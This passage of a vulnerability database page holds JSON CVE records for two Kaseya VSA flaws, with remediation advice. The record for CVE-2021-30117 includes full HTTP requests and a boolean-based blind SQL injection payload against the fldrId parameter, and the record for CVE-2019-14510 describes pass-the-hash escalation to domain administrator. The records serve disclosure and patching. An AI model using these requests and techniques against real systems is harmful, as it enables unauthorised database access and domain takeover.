          "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "SaaS version has been fixed by the vendor\n\nOnpremise\nUpgrade the server to version 9.5.6 or above\nUpgrade the agent to version 9.5.0.23 or above"
        }
      ],
      "source": {
        "advisory": "DIVD-2021-00011",
        "discovery": "INTERNAL"
      },
      "title": "Authenticated SQL injection in Kaseya VSA \u003c v9.5.6",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-30117",
          "STATE": "PUBLIC",
          "TITLE": "Authenticated SQL injection in Kaseya VSA \u003c v9.5.6"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Discovered by Wietse Boonstra of DIVD"
          },
          {
            "lang": "eng",
            "value": "Additional research by Frank Breedijk of DIVD"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 \u003c!DOCTYPE html\u003e \u003cHTML\u003e \u003cHEAD\u003e \u003ctitle\u003eWhoops.\u003c/title\u003e \u003cmeta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /\u003e \u003clink id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"\u003e\u003c/link\u003e ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. 
Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 \u003chtml\u003e \u003chead\u003e \u003ctitle\u003eExport Folder\u003c/title\u003e \u003cstyle\u003e ------ SNIP ----- ```"
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
              "refsource": "MISC",
              "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
            },
            {
              "name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
              "refsource": "CONFIRM",
              "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "SaaS version has been fixed by the vendor\n\nOnpremise\nUpgrade the server to version 9.5.6 or above\nUpgrade the agent to version 9.5.0.23 or above"
          }
        ],
        "source": {
          "advisory": "DIVD-2021-00011",
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-30117",
    "datePublished": "2021-07-09T13:18:21",
    "dateReserved": "2021-04-02T00:00:00",
    "dateUpdated": "2024-08-03T22:24:59.631Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2019-14510 (GCVE-0-2019-14510)

Vulnerability from nvd – Published: 2019-10-11 11:44 – Updated: 2024-08-05 00:19
Summary
An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)
Severity
No CVSS data available.
CWE
  • n/a
Assigner

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T00:19:41.084Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.kaseya.com/products/vsa/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://community.kaseya.com/xsp/f/355.aspx"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-10-11T11:44:18",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.kaseya.com/products/vsa/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://community.kaseya.com/xsp/f/355.aspx"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2019-14510",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.kaseya.com/products/vsa/",
              "refsource": "MISC",
              "url": "https://www.kaseya.com/products/vsa/"
            },
            {
              "name": "http://community.kaseya.com/xsp/f/355.aspx",
              "refsource": "MISC",
              "url": "http://community.kaseya.com/xsp/f/355.aspx"
            },
            {
              "name": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/",
              "refsource": "MISC",
              "url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
            },
            {
              "name": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/",
              "refsource": "MISC",
              "url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
            },
            {
              "name": "http://community.kaseya.com/xsp/f/355/t/24675.aspx",
              "refsource": "MISC",
              "url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2019-14510",
    "datePublished": "2019-10-11T11:44:18",
    "dateReserved": "2019-08-01T00:00:00",
    "dateUpdated": "2024-08-05T00:19:41.084Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}